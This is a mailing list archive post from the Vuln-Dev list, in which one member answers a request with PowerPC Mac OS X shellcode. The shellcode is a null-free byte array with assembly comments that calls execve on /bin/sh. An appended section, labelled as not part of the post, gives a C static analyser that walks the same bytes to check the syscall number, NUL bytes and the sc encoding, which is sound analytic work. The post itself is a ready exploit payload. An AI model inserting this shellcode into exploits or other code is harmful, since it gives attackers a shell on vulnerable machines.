Vulnerability Development mailing list archives
Re: OS X Shell Code
From: ghandi <ghandi () dopesquad net>
Date: Thu, 10 Jan 2002 17:42:31 -0700 (MST)
Here is some shellcode that I wrote a while back. It was written and tested on a G3 running OSX 10.0.x - 10.1.x. IIRC it worked fine on NetBSD also (same syscall number for execve) and fine on Linux with a changed system call number. The assembly language source and header files are available at http://www.dopesquad.net/security.

/* PPC MacOS X (maybe others) shellcode
 *
 * ghandi <ghandi () mindless com>
 */
char shellcode[] =
"\x7c\xa5\x2a\x79" /* xor. r5, r5, r5 ; r5 = NULL */
"\x40\xa2\xff\xfd" /* bnel shellcode */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x30" /* addi r31, r31, 268+36 */
"\x38\x7f\xfe\xf4" /* addi r3, r31, -268 ; r3 = path */
"\x90\x61\xff\xf8" /* stw r3, -8(r1) ; argv[0] = path */
"\x90\xa1\xff\xfc" /* stw r5, -4(r1) ; argv[1] = NULL */
"\x38\x81\xff\xf8" /* subi r4, r1, 8 ; r4 = {path, 0} */
"\x3b\xc0\x76\x01" /* li r30, 30209 */
"\x7f\xc0\x4e\x70" /* srawi r0, r30, 9 */
"\x44\xff\xff\x02" /* sc ; execve(r3, r4, r5) */
"/bin/sh"
;

--
ghandi / ghandi () mindless com / www.dopesquad.net
"Bein' Crazy is the least of my worries." - Jack Kerouac
C439 2B06 D8D2 A2D8 1ABB 0A55 A61D 9057 63F5 9B1F

On Thu, 10 Jan 2002, Josha Bronson wrote:
Greetings VulnDev,

Anyone have some pointers (hah.. punny..) to shellcode examples for OS X?

Thanks in advance,

--
Josha Bronson
dmuz () angrypacket com
AngryPacket Security
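
Added example, not part of ghandi's post: a small static walker an analyst could run over the posted instruction words to check what the comments claim. It counts NUL bytes, tracks the few instruction forms used here to recover the syscall number in r0 and where r3 points, and flags the sc word whose reserved bits are set (the plain encoding is 0x44000002). The struct and function names are hypothetical, and only the forms that appear in the post are modelled.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Instruction bytes copied from the post; the trailing "/bin/sh" string is left out. */
static const unsigned char code[] =
    "\x7c\xa5\x2a\x79\x40\xa2\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x30"
    "\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8"
    "\x3b\xc0\x76\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02";
#define CODE_LEN (sizeof code - 1)   /* drop the literal's terminating NUL */

struct summary {          /* hypothetical result type for this example */
    int  nul_bytes;       /* 0x00 bytes in the instruction stream */
    long r0;              /* r0 at the sc: the syscall number */
    long r3_offset;       /* r3 relative to the first instruction (the path) */
    long sc_offset;       /* offset of an sc with reserved bits set, or -1 */
};

static uint32_t be32(const unsigned char *p) {
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}

/* Walk the words once; register values are offsets from the first instruction. */
struct summary analyze(const unsigned char *buf, size_t len) {
    struct summary s = {0, -1, -1, -1};
    long reg[32] = {0}, lr = 0;
    for (size_t i = 0; i < len; i++) s.nul_bytes += (buf[i] == 0);
    for (size_t off = 0; off + 4 <= len; off += 4) {
        uint32_t w = be32(buf + off);
        unsigned op = w >> 26, d = (w >> 21) & 31, a = (w >> 16) & 31;
        long simm = (int16_t)(w & 0xffff);
        if (op == 16 && (w & 1))                        /* bc with LK=1: LR = next insn */
            lr = (long)off + 4;
        else if (w == (0x7c0802a6u | d << 21))          /* mflr rD */
            reg[d] = lr;
        else if (op == 14)                              /* addi rD, rA, SIMM (li if rA=0) */
            reg[d] = (a ? reg[a] : 0) + simm;
        else if (op == 31 && ((w >> 1) & 0x3ff) == 824) /* srawi rA, rS, SH */
            reg[a] = reg[d] >> ((w >> 11) & 31);
        else if ((w & 0xfc000002u) == 0x44000002u && w != 0x44000002u) {
            s.sc_offset = (long)off;                    /* sc, reserved bits non-zero */
            s.r0 = reg[0]; s.r3_offset = reg[3];
        }
    }
    return s;
}
int main(void) {
    struct summary s = analyze(code, CODE_LEN);
    printf("nul=%d r0=%ld r3=+%ld sc@%ld\n", s.nul_bytes, s.r0, s.r3_offset, s.sc_offset);
    return 0;
}
```

The r3 offset equals the length of the instruction bytes, so the path string has to follow the sc word directly, as it does in the posted array.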